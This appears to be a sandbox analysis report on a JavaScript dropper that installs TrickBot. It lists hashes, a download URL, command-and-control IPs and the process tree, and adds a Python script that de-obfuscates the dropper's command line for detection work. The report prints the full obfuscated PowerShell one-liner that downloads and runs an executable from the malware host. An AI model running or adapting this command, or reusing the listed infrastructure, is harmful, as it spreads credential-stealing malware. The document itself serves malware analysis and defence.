Analysis
- max time kernel: 38s
- max time network: 103s
- platform: windows7_x64
- resource: win7v20201028
- submitted: 13-01-2021 06:51

Static task: static1
Behavioral task: behavioral1
- Sample: wGGlWA9kvQ.js
- Resource: win7v20201028
General
- Target: wGGlWA9kvQ.js
- Size: 30KB
- MD5: 71e84623c9f780a2ae34c49964a1d4fd
- SHA1: 8bab366961bf4363c13b169f086c959ff8515e85
- SHA256: 4bdc0f495dfb6d2425fd712ccdda2d1943c700e3b780c37c1c147462a30c9e30
- SHA512: f4cd7ccd1bf213e3262e4268b0247466b31e3bed3b3877a54b24e58d6710b6f1e83dce581d6d88ab544382cd6559fca2955e83657fd7801d0852fd00497327eb
Malware Config

Extracted (download stage)
- URL: http://dralex.smartwebsitedesign.com/local.php

Extracted (trickbot)
- Family: trickbot
- Version: 100010
- Botnet (gtag): rob35
- C2 (all on TCP/443):
  - 5.34.180.180:443
  - 64.74.160.228:443
  - 198.46.198.116:443
  - 5.34.180.185:443
  - 107.152.46.188:443
  - 195.123.241.214:443
  - 23.254.224.2:443
  - 107.172.188.113:443
  - 200.52.147.93:443
  - 185.198.59.45:443
  - 45.14.226.101:443
  - 185.82.126.38:443
  - 85.204.116.139:443
  - 45.155.173.248:443
  - 103.91.244.50:443
  - 45.230.244.20:443
  - 45.226.124.226:443
  - 187.84.95.6:443
  - 186.250.157.116:443
  - 186.137.85.76:443
  - 36.94.62.207:443
  - 182.253.107.34:443
  - 180.92.158.244:443
- autorunName: pwgrab (TrickBot's credential-grabbing module)
Signatures

Blocklisted process makes network request (1 IoC)
  flow 6 | pid 2044 | powershell.exe

Executes dropped EXE (1 IoC)
  pid 836 | TempNeX26.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  pid 836 | TempNeX26.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid 2044 | powershell.exe (2 events)

Suspicious use of AdjustPrivilegeToken (1 IoC)
  Token: SeDebugPrivilege | pid 2044 | powershell.exe

Suspicious use of WriteProcessMemory (10 IoCs)
  PID 844 wrote to memory of 1172  | wscript.exe -> cmd.exe        (3 events)
  PID 1172 wrote to memory of 2044 | cmd.exe -> powershell.exe     (3 events)
  PID 1172 wrote to memory of 836  | cmd.exe -> TempNeX26.exe      (4 events)
Processes

1. C:\Windows\system32\wscript.exe
   wscript.exe C:\Users\Admin\AppData\Local\Temp\wGGlWA9kvQ.js
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c pOwEr^shEll -ex^ecution^pol^icy b^ypa^ss -n^oprof^ile -w h^idd^en $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://dralex.smartwebsitedesign.com/local.php','%temp%NeX26.exe'); & %temp%NeX26.exe & toMsRYPvmFupWNT
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://dralex.smartwebsitedesign.com/local.php','C:\Users\Admin\AppData\Local\TempNeX26.exe');
         - Blocklisted process makes network request
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
      3. C:\Users\Admin\AppData\Local\TempNeX26.exe
         C:\Users\Admin\AppData\Local\TempNeX26.exe
         - Executes dropped EXE
         - Suspicious behavior: CmdExeWriteProcessMemorySpam
         4. C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe

Two details of the cmd.exe line are worth noting. The carets are cmd.exe escape characters and are stripped before the child is created, so powershell.exe receives the plain arguments shown in its own command line; the split string `$v1$v2` likewise resolves to `Net.WebClient` at run time. The download target is written as `'%temp%NeX26.exe'` with no backslash after `%temp%`, so cmd.exe expands it to `C:\Users\Admin\AppData\Local\TempNeX26.exe`: a file named TempNeX26.exe in AppData\Local rather than NeX26.exe inside Temp, which is the path the dropped executable runs from above. Anyone writing a path-based detection or hunting for the drop should not assume the payload lands under %TEMP%.
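As an added example (this is not code from the Triage report or from the sample), the following Python normalises the caret-obfuscated cmd.exe command line from the process tree the way cmd.exe itself would before it spawns powershell.exe, inlines the split `$v1`/`$v2` string literals, and pulls out the indicators a responder wants: the download URL, the resolved drop path, the `New-Object` type, and the PowerShell flags. The sample command line is copied from the report; the `%temp%` value in `DEFAULT_ENV` is an assumption based on the Admin profile path the report shows, and all function names are the example's own.

```python
"""
Added example, not part of the Triage report: normalise the caret-obfuscated
cmd.exe command line from the process tree and extract the indicators in it.

cmd.exe treats '^' as its escape character and drops it, so 'pOwEr^shEll'
reaches CreateProcess as 'pOwErshEll'; image names and PowerShell parameters
are case-insensitive, so the obfuscation only defeats naive string matching.
'%temp%' is expanded by cmd.exe with no separator added, which is why
'%temp%NeX26.exe' becomes ...\Local\TempNeX26.exe rather than a file in Temp.
"""
import re

# Sample input: the wscript.exe -> cmd.exe command line copied from the report.
SAMPLE_CMDLINE = r'''"C:\Windows\System32\cmd.exe" /c pOwEr^shEll -ex^ecution^pol^icy b^ypa^ss -n^oprof^ile -w h^idd^en $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://dralex.smartwebsitedesign.com/local.php','%temp%NeX26.exe'); & %temp%NeX26.exe & toMsRYPvmFupWNT'''

# Assumed environment of the sandbox VM (Admin profile on the Win7 image);
# override when replaying a command line taken from a different host.
DEFAULT_ENV = {"temp": r"C:\Users\Admin\AppData\Local\Temp"}

ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'\s*;?\s*")
DOWNLOADFILE_RE = re.compile(r"downloadfile\(\s*'([^']*)'\s*,\s*'([^']*)'\s*\)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"),]+", re.I)
NEW_OBJECT_RE = re.compile(r"New-Object\s+([\w.]+)", re.I)
SUSPICIOUS_FLAGS = ("-executionpolicy bypass", "-noprofile", "-w hidden")


def decaret(cmdline: str) -> str:
    """Undo cmd.exe escaping: '^X' -> 'X'.  A lone trailing '^' is left alone."""
    return re.sub(r"\^(.)", r"\1", cmdline)


def expand_env(cmdline: str, env: dict) -> str:
    """Expand %VAR% the way cmd.exe does: case-insensitive lookup, unknown
    variables left untouched, and no path separator inserted after the value."""
    return re.sub(r"%([^%\s]+)%",
                  lambda m: env.get(m.group(1).lower(), m.group(0)), cmdline)


def inline_string_vars(ps: str) -> str:
    """Inline simple $name='literal' assignments so split strings such as
    $v1$v2 ('Net.W' + 'ebClient') read as Net.WebClient.  Only single-quoted
    literals are handled; anything more dynamic is left for the analyst."""
    values = dict(ASSIGN_RE.findall(ps))
    body = ASSIGN_RE.sub("", ps)
    for name in sorted(values, key=len, reverse=True):  # $v10 before $v1
        body = re.sub(r"\$" + re.escape(name) + r"\b", values[name], body)
    return body


def extract_iocs(cmdline: str, env: dict = None) -> dict:
    """Normalise a cmd.exe command line and return the indicators found in it."""
    env = env or DEFAULT_ENV
    plain = inline_string_vars(expand_env(decaret(cmdline), env))
    lower = plain.lower()
    dl = DOWNLOADFILE_RE.search(plain)
    drop = dl.group(2) if dl else None
    temp_dir = env["temp"].rstrip("\\").lower() + "\\"
    return {
        "normalized": plain,
        "launches_powershell": "powershell" in lower,
        "flags": [f for f in SUSPICIOUS_FLAGS if f in lower],
        "dotnet_types": NEW_OBJECT_RE.findall(plain),
        "urls": URL_RE.findall(plain),
        "download_url": dl.group(1) if dl else None,
        "drop_path": drop,
        # False for this sample: the file lands beside Temp, not inside it.
        "drop_inside_temp": bool(drop) and drop.lower().startswith(temp_dir),
    }


if __name__ == "__main__":
    for key, value in extract_iocs(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```

Run against the report's command line, `drop_path` resolves to the same `C:\Users\Admin\AppData\Local\TempNeX26.exe` that appears in the powershell.exe child and in the Downloads section, and `drop_inside_temp` is False, which is the point a path-based rule would otherwise miss. The same normalisation is worth applying to process-creation telemetry (Sysmon Event ID 1, EDR command-line fields) before matching on `powershell`, `bypass` or `hidden`.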
Downloads

C:\Users\Admin\AppData\Local\TempNeX26.exe
- MD5: 4f3af3f3c9cc138989d704c9f87046c1
- SHA1: 291ce0a01c87fe31cee6f16ee2f13ff9a3ea1007
- SHA256: 8386cfb3b52b83698f4fa9a1e2589770de50cdddd45fc920cda9e58627a8f465
- SHA512: 1db884d2f976e73541bff1ca179898de58d0f4ede87cb21e64a2030cd668d47fc03d1b912c53bb346abead5d45864673207bb8a0dca158985289da7fe898c5f3
Memory dumps
- memory/836-12-0x0000000000000000-mapping.dmp
- memory/844-3-0x0000000002580000-0x0000000002584000-memory.dmp (16KB)
- memory/1172-2-0x0000000000000000-mapping.dmp
- memory/1696-14-0x0000000000000000-mapping.dmp
- memory/2044-5-0x000007FEF5BF0000-0x000007FEF65DC000-memory.dmp (9.9MB)
- memory/2044-9-0x0000000002020000-0x0000000002021000-memory.dmp (4KB)
- memory/2044-10-0x000000001C340000-0x000000001C341000-memory.dmp (4KB)
- memory/2044-8-0x0000000002550000-0x0000000002551000-memory.dmp (4KB)
- memory/2044-7-0x000000001AC30000-0x000000001AC31000-memory.dmp (4KB)
- memory/2044-6-0x0000000002400000-0x0000000002401000-memory.dmp (4KB)
- memory/2044-4-0x0000000000000000-mapping.dmp